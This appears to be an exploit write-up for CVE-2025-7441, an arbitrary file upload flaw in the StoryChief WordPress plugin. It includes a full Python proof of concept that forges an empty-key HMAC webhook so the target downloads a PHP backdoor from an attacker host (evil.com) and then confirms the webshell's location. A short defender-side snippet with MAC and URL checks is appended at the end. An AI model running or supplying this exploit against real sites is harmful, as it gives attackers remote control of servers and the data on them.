Analysis and Exploitation of an Arbitrary File Upload Vulnerability in a WordPress Plugin

This post analyses in detail the arbitrary file upload vulnerability (CVE-2025-7441) in version 1.0.42 of the StoryChief WordPress plugin, including full reproduction steps and Python exploit code; an attacker can use it to upload a malicious PHP file and gain control of the server.

Exploit Title: StoryChief WordPress Plugin 1.0.42 - Arbitrary File Upload

Exploit Author: xpl0dec

Vendor Homepage: https://www.storychief.io/wordpress-content-scheduler

Software Link: https://github.com/Story-Chief/wordpress/

Affected Version: <= 1.0.42

Tested on: Linux

CVE: CVE-2025-7441

CVSS Score: 9.8

Steps to reproduce:

1. Create a file with a .php extension and fill it with the following content:

```php
<?php
header("Content-Type: image/jpeg");
echo "";
?>
```

2. Adjust the echo / phpinfo part as needed.

3. Host it on a VPS or web server under the name you want uploaded, e.g. backdoor.php.

4. The second argument is the URL of the backdoor created earlier, e.g. http://evil.com/backdoor.php.

5. Then run the exploit: python3 CVE-2025-7441.py <wordpress_url> <backdoor_url>

```python
from datetime import datetime
import requests
import json
import hmac
import hashlib
import sys
import time
import os

def banner():
    print(r"""
  _   _  ____ _____ _   _ _____ _  __  ____    _ __   __
 | \ | |/ ___| ____| | | | ____| |/ / |  _ \  / \\ \ / /
 |  \| | |  _|  _| | |_| |  _| | ' /  | | | |/ _ \\ V / 
 | |\  | |_| | |___|  _  | |___| . \  | |_| / ___ \| |  
 |_| \_|\____|_____|_| |_|_____|_|\_\ |____/_/   \_\_|  
                                                        
  PoC exploit CVE-2025-7441 by xpl0dec
    """)

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_url> <backdoor_url>")
        sys.exit(1)

    # The plugin's REST webhook endpoint
    url = sys.argv[1] + "/wp-json/storychief/webhook"

    # Body to be signed: a "publish" event whose featured image points at the hosted file
    dummy = {
        "meta": {
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    # Serialise like PHP's json_encode (compact, escaped slashes) so the MAC matches
    json_string = json.dumps(dummy, separators=(',', ':'), ensure_ascii=True)
    json_string = json_string.replace("/", "\\/").encode()

    # HMAC-SHA256 computed with an empty key
    signature = hmac.new(
        "".encode(),
        json_string,
        digestmod=hashlib.sha256
    ).hexdigest()

    headers = {
        "Content-Type": "application/json"
    }

    # Same body, now carrying the MAC in meta.mac
    payload = {
        "meta": {
            "mac" : signature,
            "event": "publish"
        },
        "data": {
            "featured_image": {
                "data": {
                    "sizes": {
                        "full": sys.argv[2]
                    }
                }
            }
        }
    }

    print("[+] 获取hmac... [+]")
    time.sleep(2)
    print("hmac : " + signature)

    response = requests.post(url, headers=headers, data=json.dumps(payload))

    if "permalink" in response.text:
        print("[+] 响应成功 [+]")
        time.sleep(2)
        print("[+] 检查上传的后门... [+]")

    # WordPress stores uploads under wp-content/uploads/<year>/<month>/
    current_datetime = datetime.now()
    month = str(current_datetime.month).zfill(2)
    year = current_datetime.year
    file_backdoor = os.path.basename(sys.argv[2])

    get_backdoor = requests.get(sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")

    if get_backdoor.status_code == 200:
        print("[+] 漏洞利用成功 [+]")
        time.sleep(2)
        print("Webshell上传位置: " + sys.argv[1] + f"/wp-content/uploads/{year}/{month}/{file_backdoor}")
```
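As an added, defender-side illustration (not the plugin's code and not part of the original advisory): the two checks a webhook handler of this shape needs, based on what the PoC shows. It assumes the MAC covers the compact, slash-escaped JSON body without `meta.mac`, as the PoC's signing step suggests; `canonical_body`, `attach_mac`, `verify_mac`, `featured_image_is_safe`, `accept_webhook` and the sample hosts are hypothetical.

```python
import hashlib
import hmac
import json
import posixpath
from urllib.parse import urlparse

# Constructed sample payloads in the shape the PoC sends (hypothetical hosts).
PAYLOAD_PHP = {"meta": {"event": "publish"}, "data": {"featured_image": {
    "data": {"sizes": {"full": "http://attacker.invalid/backdoor.php"}}}}}
PAYLOAD_JPG = {"meta": {"event": "publish"}, "data": {"featured_image": {
    "data": {"sizes": {"full": "https://cdn.example.invalid/img/cover.jpg"}}}}}
ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp"}

def canonical_body(payload):
    """Body the MAC is assumed to cover: payload without meta.mac, compact
    separators, PHP json_encode-style escaped slashes (as the PoC serialises)."""
    copy = json.loads(json.dumps(payload))
    copy.get("meta", {}).pop("mac", None)
    text = json.dumps(copy, separators=(",", ":"), ensure_ascii=True)
    return text.replace("/", "\\/").encode()

def attach_mac(payload, secret):
    """What a legitimate sender does: return a copy carrying meta.mac."""
    copy = json.loads(json.dumps(payload))
    mac = hmac.new(secret.encode(), canonical_body(copy), hashlib.sha256).hexdigest()
    copy.setdefault("meta", {})["mac"] = mac
    return copy

def verify_mac(payload, secret):
    """Refuse outright when no shared secret is configured, so a MAC made with
    an empty key (as in the PoC) never validates; compare in constant time."""
    mac = payload.get("meta", {}).get("mac")
    if not secret or not isinstance(mac, str):
        return False
    expected = hmac.new(secret.encode(), canonical_body(payload), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)

def featured_image_is_safe(payload):
    """Allow only http(s) URLs whose file name carries an image extension and no
    .php/.phtml segment; a real fix should also sniff the fetched bytes."""
    try:
        url = payload["data"]["featured_image"]["data"]["sizes"]["full"]
    except (KeyError, TypeError):
        return False
    parsed = urlparse(url)
    name = posixpath.basename(parsed.path).lower()
    return (parsed.scheme in ("http", "https") and ".php" not in name
            and ".phtml" not in name and posixpath.splitext(name)[1] in ALLOWED_IMAGE_EXT)

def accept_webhook(payload, secret):
    """Process a publish event only when both checks pass."""
    return verify_mac(payload, secret) and featured_image_is_safe(payload)
```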